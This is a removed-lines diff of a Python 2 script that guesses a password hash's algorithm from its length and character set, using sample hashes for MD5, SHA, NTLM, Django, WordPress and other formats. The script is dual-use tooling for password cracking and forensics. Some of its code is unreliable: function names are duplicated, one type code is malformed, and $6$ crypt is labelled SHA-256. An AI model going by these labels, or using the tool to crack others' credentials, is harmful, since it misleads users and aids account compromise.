"106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); 